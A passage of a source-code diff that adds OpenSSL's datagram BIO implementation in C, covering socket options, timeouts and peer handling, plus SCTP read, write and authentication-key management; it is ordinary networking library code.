+                break;
+# if OPENSSL_USE_IPV6
+            case AF_INET6:
+                memcpy(&data->peer, to, sizeof(data->peer.sa_in6));
+                break;
+# endif
+            default:
+                memcpy(&data->peer, to, sizeof(data->peer.sa));
+                break;
+            }
+        } else {
+            data->connected = 0;
+            memset(&(data->peer), 0x00, sizeof(data->peer));
+        }
+        break;
+    case BIO_CTRL_DGRAM_GET_PEER:
+        switch (data->peer.sa.sa_family) {
+        case AF_INET:
+            ret = sizeof(data->peer.sa_in);
+            break;
+# if OPENSSL_USE_IPV6
+        case AF_INET6:
+            ret = sizeof(data->peer.sa_in6);
+            break;
+# endif
+        default:
+            ret = sizeof(data->peer.sa);
+            break;
+        }
+        if (num == 0 || num > ret)
+            num = ret;
+        memcpy(ptr, &data->peer, (ret = num));
+        break;
+    case BIO_CTRL_DGRAM_SET_PEER:
+        to = (struct sockaddr *)ptr;
+        switch (to->sa_family) {
+        case AF_INET:
+            memcpy(&data->peer, to, sizeof(data->peer.sa_in));
+            break;
+# if OPENSSL_USE_IPV6
+        case AF_INET6:
+            memcpy(&data->peer, to, sizeof(data->peer.sa_in6));
+            break;
+# endif
+        default:
+            memcpy(&data->peer, to, sizeof(data->peer.sa));
+            break;
+        }
+        break;
+    case BIO_CTRL_DGRAM_SET_NEXT_TIMEOUT:
+        memcpy(&(data->next_timeout), ptr, sizeof(struct timeval));
+        break;
+# if defined(SO_RCVTIMEO)
+    case BIO_CTRL_DGRAM_SET_RECV_TIMEOUT:
+#  ifdef OPENSSL_SYS_WINDOWS
+        {
+            struct timeval *tv = (struct timeval *)ptr;
+            int timeout = tv->tv_sec * 1000 + tv->tv_usec / 1000;
+            if (setsockopt(b->num, SOL_SOCKET, SO_RCVTIMEO,
+                           (void *)&timeout, sizeof(timeout)) < 0) {
+                perror("setsockopt");
+                ret = -1;
+            }
+        }
+#  else
+        if (setsockopt(b->num, SOL_SOCKET, SO_RCVTIMEO, ptr,
+                       sizeof(struct timeval)) < 0) {
+            perror("setsockopt");
+            ret = -1;
+        }
+#  endif
+        break;
+    case BIO_CTRL_DGRAM_GET_RECV_TIMEOUT:
+        {
+            union {
+                size_t s;
+                int i;
+            } sz = {
+                0
+            };
+#  ifdef OPENSSL_SYS_WINDOWS
+            int timeout;
+            struct timeval *tv = (struct timeval *)ptr;
+
+            sz.i = sizeof(timeout);
+            if (getsockopt(b->num, SOL_SOCKET, SO_RCVTIMEO,
+                           (void *)&timeout, &sz.i) < 0) {
+                perror("getsockopt");
+                ret = -1;
+            } else {
+                tv->tv_sec = timeout / 1000;
+                tv->tv_usec = (timeout % 1000) * 1000;
+                ret = sizeof(*tv);
+            }
+#  else
+            sz.i = sizeof(struct timeval);
+            if (getsockopt(b->num, SOL_SOCKET, SO_RCVTIMEO,
+                           ptr, (void *)&sz) < 0) {
+                perror("getsockopt");
+                ret = -1;
+            } else if (sizeof(sz.s) != sizeof(sz.i) && sz.i == 0) {
+                OPENSSL_assert(sz.s <= sizeof(struct timeval));
+                ret = (int)sz.s;
+            } else
+                ret = sz.i;
+#  endif
+        }
+        break;
+# endif
+# if defined(SO_SNDTIMEO)
+    case BIO_CTRL_DGRAM_SET_SEND_TIMEOUT:
+#  ifdef OPENSSL_SYS_WINDOWS
+        {
+            struct timeval *tv = (struct timeval *)ptr;
+            int timeout = tv->tv_sec * 1000 + tv->tv_usec / 1000;
+            if (setsockopt(b->num, SOL_SOCKET, SO_SNDTIMEO,
+                           (void *)&timeout, sizeof(timeout)) < 0) {
+                perror("setsockopt");
+                ret = -1;
+            }
+        }
+#  else
+        if (setsockopt(b->num, SOL_SOCKET, SO_SNDTIMEO, ptr,
+                       sizeof(struct timeval)) < 0) {
+            perror("setsockopt");
+            ret = -1;
+        }
+#  endif
+        break;
+    case BIO_CTRL_DGRAM_GET_SEND_TIMEOUT:
+        {
+            union {
+                size_t s;
+                int i;
+            } sz = {
+                0
+            };
+#  ifdef OPENSSL_SYS_WINDOWS
+            int timeout;
+            struct timeval *tv = (struct timeval *)ptr;
+
+            sz.i = sizeof(timeout);
+            if (getsockopt(b->num, SOL_SOCKET, SO_SNDTIMEO,
+                           (void *)&timeout, &sz.i) < 0) {
+                perror("getsockopt");
+                ret = -1;
+            } else {
+                tv->tv_sec = timeout / 1000;
+                tv->tv_usec = (timeout % 1000) * 1000;
+                ret = sizeof(*tv);
+            }
+#  else
+            sz.i = sizeof(struct timeval);
+            if (getsockopt(b->num, SOL_SOCKET, SO_SNDTIMEO,
+                           ptr, (void *)&sz) < 0) {
+                perror("getsockopt");
+                ret = -1;
+            } else if (sizeof(sz.s) != sizeof(sz.i) && sz.i == 0) {
+                OPENSSL_assert(sz.s <= sizeof(struct timeval));
+                ret = (int)sz.s;
+            } else
+                ret = sz.i;
+#  endif
+        }
+        break;
+# endif
+    case BIO_CTRL_DGRAM_GET_SEND_TIMER_EXP:
+        /* fall-through */
+    case BIO_CTRL_DGRAM_GET_RECV_TIMER_EXP:
+# ifdef OPENSSL_SYS_WINDOWS
+        if (data->_errno == WSAETIMEDOUT)
+# else
+        if (data->_errno == EAGAIN)
+# endif
+        {
+            ret = 1;
+            data->_errno = 0;
+        } else
+            ret = 0;
+        break;
+# ifdef EMSGSIZE
+    case BIO_CTRL_DGRAM_MTU_EXCEEDED:
+        if (data->_errno == EMSGSIZE) {
+            ret = 1;
+            data->_errno = 0;
+        } else
+            ret = 0;
+        break;
+# endif
+    case BIO_CTRL_DGRAM_SET_DONT_FRAG:
+        sockopt_val = num ? 1 : 0;
+
+        switch (data->peer.sa.sa_family) {
+        case AF_INET:
+# if defined(IP_DONTFRAG)
+            if ((ret = setsockopt(b->num, IPPROTO_IP, IP_DONTFRAG,
+                                  &sockopt_val, sizeof(sockopt_val))) < 0) {
+                perror("setsockopt");
+                ret = -1;
+            }
+# elif defined(OPENSSL_SYS_LINUX) && defined(IP_MTUDISCOVER)
+            if ((sockopt_val = num ? IP_PMTUDISC_PROBE : IP_PMTUDISC_DONT),
+                (ret = setsockopt(b->num, IPPROTO_IP, IP_MTU_DISCOVER,
+                                  &sockopt_val, sizeof(sockopt_val))) < 0) {
+                perror("setsockopt");
+                ret = -1;
+            }
+# elif defined(OPENSSL_SYS_WINDOWS) && defined(IP_DONTFRAGMENT)
+            if ((ret = setsockopt(b->num, IPPROTO_IP, IP_DONTFRAGMENT,
+                                  (const char *)&sockopt_val,
+                                  sizeof(sockopt_val))) < 0) {
+                perror("setsockopt");
+                ret = -1;
+            }
+# else
+            ret = -1;
+# endif
+            break;
+# if OPENSSL_USE_IPV6
+        case AF_INET6:
+#  if defined(IPV6_DONTFRAG)
+            if ((ret = setsockopt(b->num, IPPROTO_IPV6, IPV6_DONTFRAG,
+                                  (const void *)&sockopt_val,
+                                  sizeof(sockopt_val))) < 0) {
+                perror("setsockopt");
+                ret = -1;
+            }
+#  elif defined(OPENSSL_SYS_LINUX) && defined(IPV6_MTUDISCOVER)
+            if ((sockopt_val = num ? IP_PMTUDISC_PROBE : IP_PMTUDISC_DONT),
+                (ret = setsockopt(b->num, IPPROTO_IPV6, IPV6_MTU_DISCOVER,
+                                  &sockopt_val, sizeof(sockopt_val))) < 0) {
+                perror("setsockopt");
+                ret = -1;
+            }
+#  else
+            ret = -1;
+#  endif
+            break;
+# endif
+        default:
+            ret = -1;
+            break;
+        }
+        break;
+    case BIO_CTRL_DGRAM_GET_MTU_OVERHEAD:
+        ret = dgram_get_mtu_overhead(data);
+        break;
+    default:
+        ret = 0;
+        break;
+    }
+    return (ret);
+}
+
+static int dgram_puts(BIO *bp, const char *str)
+{
+    int n, ret;
+
+    n = strlen(str);
+    ret = dgram_write(bp, str, n);
+    return (ret);
+}
+
+# ifndef OPENSSL_NO_SCTP
+BIO_METHOD *BIO_s_datagram_sctp(void)
+{
+    return (&methods_dgramp_sctp);
+}
+
+BIO *BIO_new_dgram_sctp(int fd, int close_flag)
+{
+    BIO *bio;
+    int ret, optval = 20000;
+    int auth_data = 0, auth_forward = 0;
+    unsigned char *p;
+    struct sctp_authchunk auth;
+    struct sctp_authchunks *authchunks;
+    socklen_t sockopt_len;
+#  ifdef SCTP_AUTHENTICATION_EVENT
+#   ifdef SCTP_EVENT
+    struct sctp_event event;
+#   else
+    struct sctp_event_subscribe event;
+#   endif
+#  endif
+
+    bio = BIO_new(BIO_s_datagram_sctp());
+    if (bio == NULL)
+        return (NULL);
+    BIO_set_fd(bio, fd, close_flag);
+
+    /* Activate SCTP-AUTH for DATA and FORWARD-TSN chunks */
+    auth.sauth_chunk = OPENSSL_SCTP_DATA_CHUNK_TYPE;
+    ret =
+        setsockopt(fd, IPPROTO_SCTP, SCTP_AUTH_CHUNK, &auth,
+                   sizeof(struct sctp_authchunk));
+    if (ret < 0) {
+        BIO_vfree(bio);
+        return (NULL);
+    }
+    auth.sauth_chunk = OPENSSL_SCTP_FORWARD_CUM_TSN_CHUNK_TYPE;
+    ret =
+        setsockopt(fd, IPPROTO_SCTP, SCTP_AUTH_CHUNK, &auth,
+                   sizeof(struct sctp_authchunk));
+    if (ret < 0) {
+        BIO_vfree(bio);
+        return (NULL);
+    }
+
+    /*
+     * Test if activation was successful. When using accept(), SCTP-AUTH has
+     * to be activated for the listening socket already, otherwise the
+     * connected socket won't use it.
+     */
+    sockopt_len = (socklen_t) (sizeof(sctp_assoc_t) + 256 * sizeof(uint8_t));
+    authchunks = OPENSSL_malloc(sockopt_len);
+    memset(authchunks, 0, sizeof(sockopt_len));
+    ret =
+        getsockopt(fd, IPPROTO_SCTP, SCTP_LOCAL_AUTH_CHUNKS, authchunks,
+                   &sockopt_len);
+
+    if (ret < 0) {
+        OPENSSL_free(authchunks);
+        BIO_vfree(bio);
+        return (NULL);
+    }
+
+    for (p = (unsigned char *)authchunks->gauth_chunks;
+         p < (unsigned char *)authchunks + sockopt_len;
+         p += sizeof(uint8_t)) {
+        if (*p == OPENSSL_SCTP_DATA_CHUNK_TYPE)
+            auth_data = 1;
+        if (*p == OPENSSL_SCTP_FORWARD_CUM_TSN_CHUNK_TYPE)
+            auth_forward = 1;
+    }
+
+    OPENSSL_free(authchunks);
+
+    OPENSSL_assert(auth_data);
+    OPENSSL_assert(auth_forward);
+
+#  ifdef SCTP_AUTHENTICATION_EVENT
+#   ifdef SCTP_EVENT
+    memset(&event, 0, sizeof(struct sctp_event));
+    event.se_assoc_id = 0;
+    event.se_type = SCTP_AUTHENTICATION_EVENT;
+    event.se_on = 1;
+    ret =
+        setsockopt(fd, IPPROTO_SCTP, SCTP_EVENT, &event,
+                   sizeof(struct sctp_event));
+    if (ret < 0) {
+        BIO_vfree(bio);
+        return (NULL);
+    }
+#   else
+    sockopt_len = (socklen_t) sizeof(struct sctp_event_subscribe);
+    ret = getsockopt(fd, IPPROTO_SCTP, SCTP_EVENTS, &event, &sockopt_len);
+    if (ret < 0) {
+        BIO_vfree(bio);
+        return (NULL);
+    }
+
+    event.sctp_authentication_event = 1;
+
+    ret =
+        setsockopt(fd, IPPROTO_SCTP, SCTP_EVENTS, &event,
+                   sizeof(struct sctp_event_subscribe));
+    if (ret < 0) {
+        BIO_vfree(bio);
+        return (NULL);
+    }
+#   endif
+#  endif
+
+    /*
+     * Disable partial delivery by setting the min size larger than the max
+     * record size of 2^14 + 2048 + 13
+     */
+    ret =
+        setsockopt(fd, IPPROTO_SCTP, SCTP_PARTIAL_DELIVERY_POINT, &optval,
+                   sizeof(optval));
+    if (ret < 0) {
+        BIO_vfree(bio);
+        return (NULL);
+    }
+
+    return (bio);
+}
+
+int BIO_dgram_is_sctp(BIO *bio)
+{
+    return (BIO_method_type(bio) == BIO_TYPE_DGRAM_SCTP);
+}
+
+static int dgram_sctp_new(BIO *bi)
+{
+    bio_dgram_sctp_data *data = NULL;
+
+    bi->init = 0;
+    bi->num = 0;
+    data = OPENSSL_malloc(sizeof(bio_dgram_sctp_data));
+    if (data == NULL)
+        return 0;
+    memset(data, 0x00, sizeof(bio_dgram_sctp_data));
+#  ifdef SCTP_PR_SCTP_NONE
+    data->prinfo.pr_policy = SCTP_PR_SCTP_NONE;
+#  endif
+    bi->ptr = data;
+
+    bi->flags = 0;
+    return (1);
+}
+
+static int dgram_sctp_free(BIO *a)
+{
+    bio_dgram_sctp_data *data;
+
+    if (a == NULL)
+        return (0);
+    if (!dgram_clear(a))
+        return 0;
+
+    data = (bio_dgram_sctp_data *) a->ptr;
+    if (data != NULL) {
+        if (data->saved_message.data != NULL)
+            OPENSSL_free(data->saved_message.data);
+        OPENSSL_free(data);
+    }
+
+    return (1);
+}
+
+#  ifdef SCTP_AUTHENTICATION_EVENT
+void dgram_sctp_handle_auth_free_key_event(BIO *b,
+                                           union sctp_notification *snp)
+{
+    int ret;
+    struct sctp_authkey_event *authkeyevent = &snp->sn_auth_event;
+
+    if (authkeyevent->auth_indication == SCTP_AUTH_FREE_KEY) {
+        struct sctp_authkeyid authkeyid;
+
+        /* delete key */
+        authkeyid.scact_keynumber = authkeyevent->auth_keynumber;
+        ret = setsockopt(b->num, IPPROTO_SCTP, SCTP_AUTH_DELETE_KEY,
+                         &authkeyid, sizeof(struct sctp_authkeyid));
+    }
+}
+#  endif
+
+static int dgram_sctp_read(BIO *b, char *out, int outl)
+{
+    int ret = 0, n = 0, i, optval;
+    socklen_t optlen;
+    bio_dgram_sctp_data *data = (bio_dgram_sctp_data *) b->ptr;
+    union sctp_notification *snp;
+    struct msghdr msg;
+    struct iovec iov;
+    struct cmsghdr *cmsg;
+    char cmsgbuf[512];
+
+    if (out != NULL) {
+        clear_socket_error();
+
+        do {
+            memset(&data->rcvinfo, 0x00,
+                   sizeof(struct bio_dgram_sctp_rcvinfo));
+            iov.iov_base = out;
+            iov.iov_len = outl;
+            msg.msg_name = NULL;
+            msg.msg_namelen = 0;
+            msg.msg_iov = &iov;
+            msg.msg_iovlen = 1;
+            msg.msg_control = cmsgbuf;
+            msg.msg_controllen = 512;
+            msg.msg_flags = 0;
+            n = recvmsg(b->num, &msg, 0);
+
+            if (n <= 0) {
+                if (n < 0)
+                    ret = n;
+                break;
+            }
+
+            if (msg.msg_controllen > 0) {
+                for (cmsg = CMSG_FIRSTHDR(&msg); cmsg;
+                     cmsg = CMSG_NXTHDR(&msg, cmsg)) {
+                    if (cmsg->cmsg_level != IPPROTO_SCTP)
+                        continue;
+#  ifdef SCTP_RCVINFO
+                    if (cmsg->cmsg_type == SCTP_RCVINFO) {
+                        struct sctp_rcvinfo *rcvinfo;
+
+                        rcvinfo = (struct sctp_rcvinfo *)CMSG_DATA(cmsg);
+                        data->rcvinfo.rcv_sid = rcvinfo->rcv_sid;
+                        data->rcvinfo.rcv_ssn = rcvinfo->rcv_ssn;
+                        data->rcvinfo.rcv_flags = rcvinfo->rcv_flags;
+                        data->rcvinfo.rcv_ppid = rcvinfo->rcv_ppid;
+                        data->rcvinfo.rcv_tsn = rcvinfo->rcv_tsn;
+                        data->rcvinfo.rcv_cumtsn = rcvinfo->rcv_cumtsn;
+                        data->rcvinfo.rcv_context = rcvinfo->rcv_context;
+                    }
+#  endif
+#  ifdef SCTP_SNDRCV
+                    if (cmsg->cmsg_type == SCTP_SNDRCV) {
+                        struct sctp_sndrcvinfo *sndrcvinfo;
+
+                        sndrcvinfo =
+                            (struct sctp_sndrcvinfo *)CMSG_DATA(cmsg);
+                        data->rcvinfo.rcv_sid = sndrcvinfo->sinfo_stream;
+                        data->rcvinfo.rcv_ssn = sndrcvinfo->sinfo_ssn;
+                        data->rcvinfo.rcv_flags = sndrcvinfo->sinfo_flags;
+                        data->rcvinfo.rcv_ppid = sndrcvinfo->sinfo_ppid;
+                        data->rcvinfo.rcv_tsn = sndrcvinfo->sinfo_tsn;
+                        data->rcvinfo.rcv_cumtsn = sndrcvinfo->sinfo_cumtsn;
+                        data->rcvinfo.rcv_context = sndrcvinfo->sinfo_context;
+                    }
+#  endif
+                }
+            }
+
+            if (msg.msg_flags & MSG_NOTIFICATION) {
+                snp = (union sctp_notification *)out;
+                if (snp->sn_header.sn_type == SCTP_SENDER_DRY_EVENT) {
+#  ifdef SCTP_EVENT
+                    struct sctp_event event;
+#  else
+                    struct sctp_event_subscribe event;
+                    socklen_t eventsize;
+#  endif
+                    /*
+                     * If a message has been delayed until the socket is dry,
+                     * it can be sent now.
+                     */
+                    if (data->saved_message.length > 0) {
+                        dgram_sctp_write(data->saved_message.bio,
+                                         data->saved_message.data,
+                                         data->saved_message.length);
+                        OPENSSL_free(data->saved_message.data);
+                        data->saved_message.data = NULL;
+                        data->saved_message.length = 0;
+                    }
+
+                    /* disable sender dry event */
+#  ifdef SCTP_EVENT
+                    memset(&event, 0, sizeof(struct sctp_event));
+                    event.se_assoc_id = 0;
+                    event.se_type = SCTP_SENDER_DRY_EVENT;
+                    event.se_on = 0;
+                    i = setsockopt(b->num, IPPROTO_SCTP, SCTP_EVENT, &event,
+                                   sizeof(struct sctp_event));
+                    if (i < 0) {
+                        ret = i;
+                        break;
+                    }
+#  else
+                    eventsize = sizeof(struct sctp_event_subscribe);
+                    i = getsockopt(b->num, IPPROTO_SCTP, SCTP_EVENTS, &event,
+                                   &eventsize);
+                    if (i < 0) {
+                        ret = i;
+                        break;
+                    }
+
+                    event.sctp_sender_dry_event = 0;
+
+                    i = setsockopt(b->num, IPPROTO_SCTP, SCTP_EVENTS, &event,
+                                   sizeof(struct sctp_event_subscribe));
+                    if (i < 0) {
+                        ret = i;
+                        break;
+                    }
+#  endif
+                }
+#  ifdef SCTP_AUTHENTICATION_EVENT
+                if (snp->sn_header.sn_type == SCTP_AUTHENTICATION_EVENT)
+                    dgram_sctp_handle_auth_free_key_event(b, snp);
+#  endif
+
+                if (data->handle_notifications != NULL)
+                    data->handle_notifications(b, data->notification_context,
+                                               (void *)out);
+
+                memset(out, 0, outl);
+            } else
+                ret += n;
+        }
+        while ((msg.msg_flags & MSG_NOTIFICATION) && (msg.msg_flags & MSG_EOR)
+               && (ret < outl));
+
+        if (ret > 0 && !(msg.msg_flags & MSG_EOR)) {
+            /* Partial message read, this should never happen! */
+
+            /*
+             * The buffer was too small, this means the peer sent a message
+             * that was larger than allowed.
+             */
+            if (ret == outl)
+                return -1;
+
+            /*
+             * Test if socket buffer can handle max record size (2^14 + 2048
+             * + 13)
+             */
+            optlen = (socklen_t) sizeof(int);
+            ret = getsockopt(b->num, SOL_SOCKET, SO_RCVBUF, &optval, &optlen);
+            if (ret >= 0)
+                OPENSSL_assert(optval >= 18445);
+
+            /*
+             * Test if SCTP doesn't partially deliver below max record size
+             * (2^14 + 2048 + 13)
+             */
+            optlen = (socklen_t) sizeof(int);
+            ret =
+                getsockopt(b->num, IPPROTO_SCTP, SCTP_PARTIAL_DELIVERY_POINT,
+                           &optval, &optlen);
+            if (ret >= 0)
+                OPENSSL_assert(optval >= 18445);
+
+            /*
+             * Partially delivered notification??? Probably a bug....
+             */
+            OPENSSL_assert(!(msg.msg_flags & MSG_NOTIFICATION));
+
+            /*
+             * Everything seems ok till now, so it's most likely a message
+             * dropped by PR-SCTP.
+             */
+            memset(out, 0, outl);
+            BIO_set_retry_read(b);
+            return -1;
+        }
+
+        BIO_clear_retry_flags(b);
+        if (ret < 0) {
+            if (BIO_dgram_should_retry(ret)) {
+                BIO_set_retry_read(b);
+                data->_errno = get_last_socket_error();
+            }
+        }
+
+        /* Test if peer uses SCTP-AUTH before continuing */
+        if (!data->peer_auth_tested) {
+            int ii, auth_data = 0, auth_forward = 0;
+            unsigned char *p;
+            struct sctp_authchunks *authchunks;
+
+            optlen =
+                (socklen_t) (sizeof(sctp_assoc_t) + 256 * sizeof(uint8_t));
+            authchunks = OPENSSL_malloc(optlen);
+            memset(authchunks, 0, sizeof(optlen));
+            ii = getsockopt(b->num, IPPROTO_SCTP, SCTP_PEER_AUTH_CHUNKS,
+                            authchunks, &optlen);
+
+            if (ii >= 0)
+                for (p = (unsigned char *)authchunks->gauth_chunks;
+                     p < (unsigned char *)authchunks + optlen;
+                     p += sizeof(uint8_t)) {
+                    if (*p == OPENSSL_SCTP_DATA_CHUNK_TYPE)
+                        auth_data = 1;
+                    if (*p == OPENSSL_SCTP_FORWARD_CUM_TSN_CHUNK_TYPE)
+                        auth_forward = 1;
+                }
+
+            OPENSSL_free(authchunks);
+
+            if (!auth_data || !auth_forward) {
+                BIOerr(BIO_F_DGRAM_SCTP_READ, BIO_R_CONNECT_ERROR);
+                return -1;
+            }
+
+            data->peer_auth_tested = 1;
+        }
+    }
+    return (ret);
+}
+
+static int dgram_sctp_write(BIO *b, const char *in, int inl)
+{
+    int ret;
+    bio_dgram_sctp_data *data = (bio_dgram_sctp_data *) b->ptr;
+    struct bio_dgram_sctp_sndinfo *sinfo = &(data->sndinfo);
+    struct bio_dgram_sctp_prinfo *pinfo = &(data->prinfo);
+    struct bio_dgram_sctp_sndinfo handshake_sinfo;
+    struct iovec iov[1];
+    struct msghdr msg;
+    struct cmsghdr *cmsg;
+#  if defined(SCTP_SNDINFO) && defined(SCTP_PRINFO)
+    char cmsgbuf[CMSG_SPACE(sizeof(struct sctp_sndinfo)) +
+                 CMSG_SPACE(sizeof(struct sctp_prinfo))];
+    struct sctp_sndinfo *sndinfo;
+    struct sctp_prinfo *prinfo;
+#  else
+    char cmsgbuf[CMSG_SPACE(sizeof(struct sctp_sndrcvinfo))];
+    struct sctp_sndrcvinfo *sndrcvinfo;
+#  endif
+
+    clear_socket_error();
+
+    /*
+     * If we're send anything else than application data, disable all user
+     * parameters and flags.
+     */
+    if (in[0] != 23) {
+        memset(&handshake_sinfo, 0x00, sizeof(struct bio_dgram_sctp_sndinfo));
+#  ifdef SCTP_SACK_IMMEDIATELY
+        handshake_sinfo.snd_flags = SCTP_SACK_IMMEDIATELY;
+#  endif
+        sinfo = &handshake_sinfo;
+    }
+
+    /*
+     * If we have to send a shutdown alert message and the socket is not dry
+     * yet, we have to save it and send it as soon as the socket gets dry.
+     */
+    if (data->save_shutdown && !BIO_dgram_sctp_wait_for_dry(b)) {
+        data->saved_message.bio = b;
+        if (data->saved_message.data)
+            OPENSSL_free(data->saved_message.data);
+        data->saved_message.data = OPENSSL_malloc(inl);
+        memcpy(data->saved_message.data, in, inl);
+        data->saved_message.length = inl;
+        return inl;
+    }
+
+    iov[0].iov_base = (char *)in;
+    iov[0].iov_len = inl;
+    msg.msg_name = NULL;
+    msg.msg_namelen = 0;
+    msg.msg_iov = iov;
+    msg.msg_iovlen = 1;
+    msg.msg_control = (caddr_t) cmsgbuf;
+    msg.msg_controllen = 0;
+    msg.msg_flags = 0;
+#  if defined(SCTP_SNDINFO) && defined(SCTP_PRINFO)
+    cmsg = (struct cmsghdr *)cmsgbuf;
+    cmsg->cmsg_level = IPPROTO_SCTP;
+    cmsg->cmsg_type = SCTP_SNDINFO;
+    cmsg->cmsg_len = CMSG_LEN(sizeof(struct sctp_sndinfo));
+    sndinfo = (struct sctp_sndinfo *)CMSG_DATA(cmsg);
+    memset(sndinfo, 0, sizeof(struct sctp_sndinfo));
+    sndinfo->snd_sid = sinfo->snd_sid;
+    sndinfo->snd_flags = sinfo->snd_flags;
+    sndinfo->snd_ppid = sinfo->snd_ppid;
+    sndinfo->snd_context = sinfo->snd_context;
+    msg.msg_controllen += CMSG_SPACE(sizeof(struct sctp_sndinfo));
+
+    cmsg =
+        (struct cmsghdr *)&cmsgbuf[CMSG_SPACE(sizeof(struct sctp_sndinfo))];
+    cmsg->cmsg_level = IPPROTO_SCTP;
+    cmsg->cmsg_type = SCTP_PRINFO;
+    cmsg->cmsg_len = CMSG_LEN(sizeof(struct sctp_prinfo));
+    prinfo = (struct sctp_prinfo *)CMSG_DATA(cmsg);
+    memset(prinfo, 0, sizeof(struct sctp_prinfo));
+    prinfo->pr_policy = pinfo->pr_policy;
+    prinfo->pr_value = pinfo->pr_value;
+    msg.msg_controllen += CMSG_SPACE(sizeof(struct sctp_prinfo));
+#  else
+    cmsg = (struct cmsghdr *)cmsgbuf;
+    cmsg->cmsg_level = IPPROTO_SCTP;
+    cmsg->cmsg_type = SCTP_SNDRCV;
+    cmsg->cmsg_len = CMSG_LEN(sizeof(struct sctp_sndrcvinfo));
+    sndrcvinfo = (struct sctp_sndrcvinfo *)CMSG_DATA(cmsg);
+    memset(sndrcvinfo, 0, sizeof(struct sctp_sndrcvinfo));
+    sndrcvinfo->sinfo_stream = sinfo->snd_sid;
+    sndrcvinfo->sinfo_flags = sinfo->snd_flags;
+#   ifdef __FreeBSD__
+    sndrcvinfo->sinfo_flags |= pinfo->pr_policy;
+#   endif
+    sndrcvinfo->sinfo_ppid = sinfo->snd_ppid;
+    sndrcvinfo->sinfo_context = sinfo->snd_context;
+    sndrcvinfo->sinfo_timetolive = pinfo->pr_value;
+    msg.msg_controllen += CMSG_SPACE(sizeof(struct sctp_sndrcvinfo));
+#  endif
+
+    ret = sendmsg(b->num, &msg, 0);
+
+    BIO_clear_retry_flags(b);
+    if (ret <= 0) {
+        if (BIO_dgram_should_retry(ret)) {
+            BIO_set_retry_write(b);
+            data->_errno = get_last_socket_error();
+        }
+    }
+    return (ret);
+}
+
+static long dgram_sctp_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    long ret = 1;
+    bio_dgram_sctp_data *data = NULL;
+    socklen_t sockopt_len = 0;
+    struct sctp_authkeyid authkeyid;
+    struct sctp_authkey *authkey = NULL;
+
+    data = (bio_dgram_sctp_data *) b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_DGRAM_QUERY_MTU:
+        /*
+         * Set to maximum (2^14) and ignore user input to enable transport
+         * protocol fragmentation. Returns always 2^14.
+         */
+        data->mtu = 16384;
+        ret = data->mtu;
+        break;
+    case BIO_CTRL_DGRAM_SET_MTU:
+        /*
+         * Set to maximum (2^14) and ignore input to enable transport
+         * protocol fragmentation. Returns always 2^14.
+         */
+        data->mtu = 16384;
+        ret = data->mtu;
+        break;
+    case BIO_CTRL_DGRAM_SET_CONNECTED:
+    case BIO_CTRL_DGRAM_CONNECT:
+        /* Returns always -1. */
+        ret = -1;
+        break;
+    case BIO_CTRL_DGRAM_SET_NEXT_TIMEOUT:
+        /*
+         * SCTP doesn't need the DTLS timer Returns always 1.
+         */
+        break;
+    case BIO_CTRL_DGRAM_GET_MTU_OVERHEAD:
+        /*
+         * We allow transport protocol fragmentation so this is irrelevant
+         */
+        ret = 0;
+        break;
+    case BIO_CTRL_DGRAM_SCTP_SET_IN_HANDSHAKE:
+        if (num > 0)
+            data->in_handshake = 1;
+        else
+            data->in_handshake = 0;
+
+        ret =
+            setsockopt(b->num, IPPROTO_SCTP, SCTP_NODELAY,
+                       &data->in_handshake, sizeof(int));
+        break;
+    case BIO_CTRL_DGRAM_SCTP_ADD_AUTH_KEY:
+        /*
+         * New shared key for SCTP AUTH. Returns 0 on success, -1 otherwise.
+         */
+
+        /* Get active key */
+        sockopt_len = sizeof(struct sctp_authkeyid);
+        ret =
+            getsockopt(b->num, IPPROTO_SCTP, SCTP_AUTH_ACTIVE_KEY, &authkeyid,
+                       &sockopt_len);
+        if (ret < 0)
+            break;
+
+        /* Add new key */
+        sockopt_len = sizeof(struct sctp_authkey) + 64 * sizeof(uint8_t);
+        authkey = OPENSSL_malloc(sockopt_len);
+        if (authkey == NULL) {
+            ret = -1;
+            break;
+        }
+        memset(authkey, 0x00, sockopt_len);
+        authkey->sca_keynumber = authkeyid.scact_keynumber + 1;
+#  ifndef __FreeBSD__
+        /*
+         * This field is missing in FreeBSD 8.2 and earlier, and FreeBSD 8.3
+         * and higher work without it.
+         */
+        authkey->sca_keylength = 64;
+#  endif
+        memcpy(&authkey->sca_key[0], ptr, 64 * sizeof(uint8_t));
+
+        ret =
+            setsockopt(b->num, IPPROTO_SCTP, SCTP_AUTH_KEY, authkey,
+                       sockopt_len);
+        OPENSSL_free(authkey);
+        authkey = NULL;
+        if (ret < 0)
+            break;
+
+        /* Reset active key */
+        ret = setsockopt(b->num, IPPROTO_SCTP, SCTP_AUTH_ACTIVE_KEY,
+                         &authkeyid, sizeof(struct sctp_authkeyid));
+        if (ret < 0)
+            break;
+
+        break;
+    case BIO_CTRL_DGRAM_SCTP_NEXT_AUTH_KEY:
+        /* Returns 0 on success, -1 otherwise. */
+
+        /* Get active key */
+        sockopt_len = sizeof(struct sctp_authkeyid);
+        ret =
+            getsockopt(b->num, IPPROTO_SCTP, SCTP_AUTH_ACTIVE_KEY, &authkeyid,
+                       &sockopt_len);
+        if (ret < 0)
+            break;
+
+        /* Set active key */
+        authkeyid.scact_keynumber = authkeyid.scact_keynumber + 1;
+        ret = setsockopt(b->num, IPPROTO_SCTP, SCTP_AUTH_ACTIVE_KEY,
+                         &authkeyid, sizeof(struct sctp_authkeyid));
+        if (ret < 0)
+            break;
+
+        /*
+         * CCS has been sent, so remember that and fall through to check if
+         * we need to deactivate an old key
+         */
+        data->ccs_sent = 1;
+
+    case BIO_CTRL_DGRAM_SCTP_AUTH_CCS_RCVD:
+        /* Returns 0 on success, -1 otherwise. */
+
+        /*
+         * Has this command really been called or is this just a
+         * fall-through?
+         */
+        if (cmd == BIO_CTRL_DGRAM_SCTP_AUTH_CCS_RCVD)
+            data->ccs_rcvd = 1;
+
+        /*
+         * CSS has been both, received and sent, so deactivate an old key
+         */
+        if (data->ccs_rcvd == 1 && data->ccs_sent == 1) {
+            /* Get active key */
+            sockopt_len = sizeof(struct sctp_authkeyid);
+            ret =
+                getsockopt(b->num, IPPROTO_SCTP, SCTP_AUTH_ACTIVE_KEY,
+                           &authkeyid, &sockopt_len);
+            if (ret < 0)
+                break;
+
+            /*
+             * Deactivate key or delete second last key if
+             * SCTP_AUTHENTICATION_EVENT is not available.
+             */
+            authkeyid.scact_keynumber = authkeyid.scact_keynumber - 1;
